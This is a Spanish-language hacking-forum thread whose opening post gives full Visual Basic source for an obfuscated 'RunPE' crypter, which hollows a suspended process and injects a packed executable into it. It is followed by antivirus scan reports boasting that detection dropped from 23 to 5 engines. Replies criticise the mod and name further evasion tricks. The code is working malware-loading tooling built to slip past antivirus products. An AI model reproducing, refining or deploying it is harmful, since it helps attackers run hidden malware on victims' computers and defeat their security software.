Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Runpe Mod 2º

  • 2 Respuestas
  • 4296 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado K4RUN4

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Diciembre 08, 2012, 10:54:12 pm »
Código: Visual Basic
  1. Private Const F447LC9Xk As Long = &H10007
  2. Private Const nW3PkSMii As Integer = 260
  3. Private Const uAEcIoE8o As Long = &H4
  4. Private Const eSzW7GQdf As Long = &H1000
  5. Private Const HdsMEIXAx As Long = &H2000
  6. Private Const bCd05T2O6 As Long = &H40
  7. Private Declare Function CreateProcessA Lib "kernel32" (ByVal ZEuNODw1p As String, ByVal xMmicgUXB As String, ByVal nHQpEku43 As Long, ByVal QQ9E2IRO2 As Long, ByVal sf7Q6FWqz As Long, ByVal klh1LC0qa As Long, ByVal gpOq0ar08 As Long, ByVal lqV4QmVRl As Long, A9XZ0eH3c As IQVNXBW1K, XTbTNStC1 As IEuMTkEWN) As Long
  8. Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal fwp8F4lI1 As Long, UZLbQvjpN As Any, ADhSYKaSj As Any, ByVal rPTyCbu0O As Long, FRzhBrXZ3 As Long) As Long
  9. Private Declare Function MJbmWIYXu Lib "kernel32" Alias "OutputDebugStringA" (ByVal vXeYdumBr As String) As Long
  10. Public Declare Sub RtlMoveMemory Lib "kernel32            " (coZ2NvrKQ As Any, nxNRVRMkt As Any, ByVal W3EjZ6INJ As Long)
  11. Private Declare Function CallWindowProcW Lib "user32               " (ByVal x9gbSV7nf As Long, ByVal Jwx0qigOk As Long, ByVal XMGKQAwG0 As Long, ByVal FR8tPRVTq As Long, ByVal rd7Ig24TO As Long) As Long
  12. Private Declare Function GetProcAddress Lib "kernel32" (ByVal R9W0Wwz8O As Long, ByVal bEH39kATm As String) As Long
  13. Private Declare Function LoadLibraryA Lib "kernel32" (ByVal PSc4W5Rzh As String) As Long
  14. Private Type l741Ghab0
  15. nLength As Long
  16. lpSecurityDescriptor As Long
  17. bInheritHandle As Long
  18. End Type
  19. Private Type IQVNXBW1K
  20. cb As Long
  21. lpReserved As Long
  22. lpDesktop As Long
  23. lpTitle As Long
  24. dwX As Long
  25. dwY As Long
  26. dwXSize As Long
  27. dwYSize As Long
  28. dwXCountChars As Long
  29. dwYCountChars As Long
  30. dwFillAttribute As Long
  31. dwFlags As Long
  32. wShowWindow As Integer
  33. cbReserved2 As Integer
  34. lpReserved2 As Long
  35. hStdInput As Long
  36. hStdOutput As Long
  37. hStdError As Long
  38. End Type
  39. Private Type IEuMTkEWN
  40. fwp8F4lI1 As Long
  41. hThread As Long
  42. dwProcessId As Long
  43. dwThreadID As Long
  44. End Type
  45. Private Type Aa5vmpDi3
  46. ControlWord As Long
  47. StatusWord As Long
  48. TagWord As Long
  49. ErrorOffset As Long
  50. ErrorSelector As Long
  51. DataOffset As Long
  52. DataSelector As Long
  53. RegisterArea(1 To 80) As Byte
  54. Cr0NpxState As Long
  55. End Type
  56. Private Type Rk3tnkYdN
  57. ContextFlags As Long
  58. Dr0 As Long
  59. Dr1 As Long
  60. Dr2 As Long
  61. Dr3 As Long
  62. Dr6 As Long
  63. Dr7 As Long
  64. FloatSave As Aa5vmpDi3
  65. SegGs As Long
  66. SegFs As Long
  67. SegEs As Long
  68. SegDs As Long
  69. Edi As Long
  70. Esi As Long
  71. Ebx As Long
  72. Edx As Long
  73. Ecx As Long
  74. Eax As Long
  75. Ebp As Long
  76. Eip As Long
  77. SegCs As Long
  78. EFlags As Long
  79. Esp As Long
  80. SegSs As Long
  81. End Type
  82. Private Type K2X0B2HMz
  83. e_magic As Integer
  84. e_cblp As Integer
  85. e_cp As Integer
  86. e_crlc As Integer
  87. e_cparhdr As Integer
  88. e_minalloc As Integer
  89. e_maxalloc As Integer
  90. e_ss As Integer
  91. e_sp As Integer
  92. e_csum As Integer
  93. e_ip As Integer
  94. e_cs As Integer
  95. e_lfarlc As Integer
  96. e_ovno As Integer
  97. e_res(0 To 3) As Integer
  98. e_oemid As Integer
  99. e_oeminfo As Integer
  100. e_res2(0 To 9) As Integer
  101. e_lfanew As Long
  102. End Type
  103. Private Type DL1Kv8t0h
  104. Machine As Integer
  105. NumberOfSections As Integer
  106. TimeDateStamp As Long
  107. PointerToSymbolTable As Long
  108. NumberOfSymbols As Long
  109. SizeOfOptionalHeader As Integer
  110. characteristics As Integer
  111. End Type
  112. Private Type kEnzAI55k
  113. VirtualAddress As Long
  114. Size As Long
  115. End Type
  116. Private Type KjpHYYXJc
  117. Magic As Integer
  118. MajorLinkerVersion As Byte
  119. MinorLinkerVersion As Byte
  120. SizeOfCode As Long
  121. SizeOfInitializedData As Long
  122. SizeOfUnitializedData As Long
  123. AddressOfEntryPoint As Long
  124. BaseOfCode As Long
  125. BaseOfData As Long
  126. ' NT additional fields.
  127. ImageBase As Long
  128. SectionAlignment As Long
  129. FileAlignment As Long
  130. MajorOperatingSystemVersion As Integer
  131. MinorOperatingSystemVersion As Integer
  132. MajorImageVersion As Integer
  133. MinorImageVersion As Integer
  134. MajorSubsystemVersion As Integer
  135. MinorSubsystemVersion As Integer
  136. W32VersionValue As Long
  137. SizeOfImage As Long
  138. SizeOfHeaders As Long
  139. CheckSum As Long
  140. SubSystem As Integer
  141. DllCharacteristics As Integer
  142. SizeOfStackReserve As Long
  143. SizeOfStackCommit As Long
  144. SizeOfHeapReserve As Long
  145. SizeOfHeapCommit As Long
  146. LoaderFlags As Long
  147. NumberOfRvaAndSizes As Long
  148. DataDirectory(0 To 15) As kEnzAI55k
  149. End Type
  150. Private Type SneHkJnLR
  151. Signature As Long
  152. FileHeader As DL1Kv8t0h
  153. OptionalHeader As KjpHYYXJc
  154. End Type
  155. Private Type k9W00b66a
  156. SecName As String * 8
  157. VirtualSize As Long
  158. VirtualAddress As Long
  159. SizeOfRawData As Long
  160. PointerToRawData As Long
  161. PointerToRelocations As Long
  162. PointerToLinenumbers As Long
  163. NumberOfRelocations As Integer
  164. NumberOfLinenumbers As Integer
  165. characteristics As Long
  166. End Type
  167. Public Function okLbTkVkI(REbjcq5c4 As String, RfhiH80fE As Integer)
  168.     Dim e2u96yIrC As Integer
  169.    
  170.     For e2u96yIrC = 1 To Len(REbjcq5c4)
  171.         Mid(REbjcq5c4, e2u96yIrC, 1) = Chr(Asc(Mid(REbjcq5c4, e2u96yIrC, 1)) - RfhiH80fE)
  172.     Next e2u96yIrC
  173.     okLbTkVkI = REbjcq5c4
  174. End Function
  175. Sub cgjyTadqQ(ByVal sHost As String, ByRef ADhSYKaSj() As Byte, parameter As String)
  176. Dim tFogYBkqM As Long
  177. Dim Bu5wgPZne As K2X0B2HMz
  178. Dim HIKRNiitq As SneHkJnLR
  179. Dim UhtIMHdMW As k9W00b66a
  180. Dim axquzdtgF As IQVNXBW1K
  181. Dim lJYqbyJJM As IEuMTkEWN
  182. Dim DukBkGsk0 As Rk3tnkYdN
  183. axquzdtgF.cb = Len(axquzdtgF)
  184. RtlMoveMemory Bu5wgPZne, ADhSYKaSj(0), 64
  185. RtlMoveMemory HIKRNiitq, ADhSYKaSj(Bu5wgPZne.e_lfanew), 248
  186. CreateProcessA sHost, okLbTkVkI(wVAxmxZR0("/", wVAxmxZR0(";", "2")), wVAxmxZR0("<", wVAxmxZR0(";", "5"))) & parameter, 0, 0, False, uAEcIoE8o, 0, 0, axquzdtgF, lJYqbyJJM
  187. mOCsghEaW okLbTkVkI(wVAxmxZR0("|‚rzz", "8"), wVAxmxZR0("<", wVAxmxZR0(";", "5"))), okLbTkVkI(wVAxmxZR0("U{\uthw]pl~VmZlj{pvu", "3"), wVAxmxZR0(wVAxmxZR0(";", "2"), "5")), lJYqbyJJM.fwp8F4lI1, HIKRNiitq.OptionalHeader.ImageBase
  188. mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("fy‚„…q|Q||sUˆ", wVAxmxZR0("<", "3")), wVAxmxZR0("8", wVAxmxZR0(wVAxmxZR0("<", "3"), "8"))), lJYqbyJJM.fwp8F4lI1, HIKRNiitq.OptionalHeader.ImageBase, HIKRNiitq.OptionalHeader.SizeOfImage, eSzW7GQdf Or HdsMEIXAx, bCd05T2O6
  189. WriteProcessMemory lJYqbyJJM.fwp8F4lI1, ByVal HIKRNiitq.OptionalHeader.ImageBase, ADhSYKaSj(0), HIKRNiitq.OptionalHeader.SizeOfHeaders, 0
  190. For tFogYBkqM = 0 To HIKRNiitq.FileHeader.NumberOfSections - 1
  191. RtlMoveMemory UhtIMHdMW, ADhSYKaSj(Bu5wgPZne.e_lfanew + 248 + 40 * tFogYBkqM), Len(UhtIMHdMW)
  192. WriteProcessMemory lJYqbyJJM.fwp8F4lI1, ByVal HIKRNiitq.OptionalHeader.ImageBase + UhtIMHdMW.VirtualAddress, ADhSYKaSj(UhtIMHdMW.PointerToRawData), UhtIMHdMW.SizeOfRawData, 0
  193. Next tFogYBkqM
  194. DukBkGsk0.ContextFlags = F447LC9Xk
  195. mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("LjyYmwjfiHtsyj}y", "4"), wVAxmxZR0(wVAxmxZR0("<", "3"), "8")), lJYqbyJJM.hThread, VarPtr(DukBkGsk0)
  196. WriteProcessMemory lJYqbyJJM.fwp8F4lI1, ByVal DukBkGsk0.Ebx + 8, HIKRNiitq.OptionalHeader.ImageBase, 4, 0
  197. DukBkGsk0.Eax = HIKRNiitq.OptionalHeader.ImageBase + HIKRNiitq.OptionalHeader.AddressOfEntryPoint
  198. mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("`raurnqP|{r…", "4"), wVAxmxZR0(";", "2")), lJYqbyJJM.hThread, VarPtr(DukBkGsk0)
  199. mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("`sƒ{sbv€sor", "5"), wVAxmxZR0(";", "2")), lJYqbyJJM.hThread
  200. End Sub
  201.  Function mOCsghEaW(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
  202. Dim iaQt4rNA9 As Long
  203. Dim cluYs57Jw(&HEC00& - 1) As Byte
  204. Dim tFogYBkqM As Long
  205. Dim xsYHO71Kp As Long
  206.  
  207. xsYHO71Kp = GetProcAddress(LoadLibraryA(sLib), sMod)
  208. If xsYHO71Kp = 0 Then Exit Function
  209.  
  210. iaQt4rNA9 = VarPtr(cluYs57Jw(0))
  211. RtlMoveMemory ByVal iaQt4rNA9, &H59595958, &H4: iaQt4rNA9 = iaQt4rNA9 + 4
  212. RtlMoveMemory ByVal iaQt4rNA9, &H5059, &H2: iaQt4rNA9 = iaQt4rNA9 + 2
  213. For tFogYBkqM = UBound(Params) To 0 Step -1
  214. RtlMoveMemory ByVal iaQt4rNA9, &H68, &H1: iaQt4rNA9 = iaQt4rNA9 + 1
  215. RtlMoveMemory ByVal iaQt4rNA9, CLng(Params(tFogYBkqM)), &H4: iaQt4rNA9 = iaQt4rNA9 + 4
  216. Next
  217. RtlMoveMemory ByVal iaQt4rNA9, &HE8, &H1: iaQt4rNA9 = iaQt4rNA9 + 1
  218. RtlMoveMemory ByVal iaQt4rNA9, xsYHO71Kp - iaQt4rNA9 - 4, &H4: iaQt4rNA9 = iaQt4rNA9 + 4
  219. RtlMoveMemory ByVal iaQt4rNA9, &HC3, &H1: iaQt4rNA9 = iaQt4rNA9 + 1
  220. mOCsghEaW = CallWindowProcW(VarPtr(cluYs57Jw(0)), 0, 0, 0, 0)
  221. End Function
  222.  
  223. Public Function wVAxmxZR0(eczX16djq As String, cW5sVXYkV As Integer)
  224.     Dim wlUnDp6U2 As Integer
  225.    
  226.     For wlUnDp6U2 = 1 To Len(eczX16djq)
  227.         Mid(eczX16djq, wlUnDp6U2, 1) = Chr(Asc(Mid(eczX16djq, wlUnDp6U2, 1)) - cW5sVXYkV)
  228.     Next wlUnDp6U2
  229.     wVAxmxZR0 = eczX16djq
  230. End Function

Date and Time: 12/8/2012 8:47:39 PM
File Name: Antes.exe
File Size: 16384 Bytes
MD5: 5d0e5cf9778421e9ad666d8d74a9e116
SHA1: e2d9ccc127170966fcf49725618a59d19df1cad7
Detection: 23 of 35 (66%)
Status: INFECTED

AVG Free - Trojan horse Injector.CBI
ArcaVir - Clean!
Avast 5 - Clean!
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
VirusBuster Internet Security - Trojan.VBInject.Gen.7
Clam Antivirus - Clean!
COMODO Internet Security - Clean!
Dr.Web - Trojan.Qqlame

eTrust-Vet - Win32/VBInject.D!generic
F-PROT Antivirus - W32/VBInject.CC.gen!Eldorado (generic, not disinfectable)
F-Secure Internet Security - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
G Data - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
IKARUS Security - Virus.Win32.VBInject
Kaspersky Antivirus - Worm.Win32.VBNA.b
McAfee - Clean!
MS Security Essentials - VirTool:Win32/VBInject.RT
ESET NOD32 - Trojan.Win32/Injector.WZ
Norman - win32/VBInject.YG
Norton Antivirus - Clean!
Panda Security - Clean!
A-Squared - Virus.Win32.VBInject!IK
Quick Heal Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Mal/VBInject-AK
Trend Micro Internet Security - Clean!
VBA32 Antivirus - infected SScope.Trojan.VBRA.3587
Vexira Antivirus - Trojan.VBInject.Gen.7
Zoner AntiVirus - Clean!
Ad-Aware - VirTool.Win32.VBInject.gen.bp (v)
BullGuard - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
Immunet Antivirus - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
K7 Ultimate - Riskware ( ed2edfef0 )
NANO Antivirus - Clean!
VIPRE - VirTool.Win32.VBInject.gen.bp (v)

Report Generated by scanner.foromalware.com

Date and Time: 12/8/2012 8:43:12 PM
File Name: Final.exe
File Size: 20480 Bytes
MD5: f6f0b5f07628932200386c2e26522310
SHA1: f626a85cff0e06a7a722cad6917bc57fd5651c8a
Detection: 5 of 35 (14%)
Status: INFECTED

AVG Free - Clean!
ArcaVir - Clean!
Avast 5 - Clean!
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Clean!
VirusBuster Internet Security - Clean!
Clam Antivirus - Clean!
COMODO Internet Security - Clean!
Dr.Web - Clean!
eTrust-Vet - Clean!
F-PROT Antivirus - Clean!
F-Secure Internet Security - Clean!
G Data - Clean!
IKARUS Security - Backdoor.Win32.Poison
Kaspersky Antivirus - Clean!
McAfee - Clean!
MS Security Essentials - Clean!
ESET NOD32 - Clean!
Norman - win32/VBInject.YG
Norton Antivirus - Clean!
Panda Security - Suspicious
A-Squared - Backdoor.Win32.Poison!IK
Quick Heal Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Clean!
Trend Micro Internet Security - Clean!
VBA32 Antivirus - Clean!
Vexira Antivirus - Clean!
Zoner AntiVirus - Clean!
Ad-Aware - Clean!
BullGuard - Clean!
Immunet Antivirus - Clean!
K7 Ultimate - Clean!
NANO Antivirus - Clean!
VIPRE - Clean!

Report Generated by scanner.foromalware.com
« Última modificación: Mayo 12, 2014, 03:36:34 pm por Expermicid »

Desconectado k0ws

  • *
  • Underc0der
  • Mensajes: 145
  • Actividad:
    0%
  • Reputación 0
  • I'm Back
    • Ver Perfil
  • Skype: k0wsit0
« Respuesta #1 en: Diciembre 10, 2012, 10:19:40 pm »
Esta bien que quieras aportar, pero te lo vuelvo a repetir, esto no es una mod bien hecha, una mod bien hecha es aquela en la cual se mejoran los runpes y se modifican sabiamente (CallApiByName,ZombieInvoke,etc).Lo que has hecho es darle a un boton  :(.
Gracias de todas formas.

-Saludos-

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #2 en: Diciembre 10, 2012, 10:40:44 pm »
Esta bien que quieras aportar, pero te lo vuelvo a repetir, esto no es una mod bien hecha, una mod bien hecha es aquela en la cual se mejoran los runpes y se modifican sabiamente (CallApiByName,ZombieInvoke,etc).Lo que has hecho es darle a un boton  :(.
Gracias de todas formas.

-Saludos-

+1 Un ejemplo de lo que no se debe de realizar
http://www.sniferl4bs.com


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



 

¿Te gustó el post? COMPARTILO!



RunPe + Invoke ( FUD) By M3

Iniciado por ANTRAX

Respuestas: 2
Vistas: 4899
Último mensaje Junio 09, 2012, 01:06:02 pm
por decoder79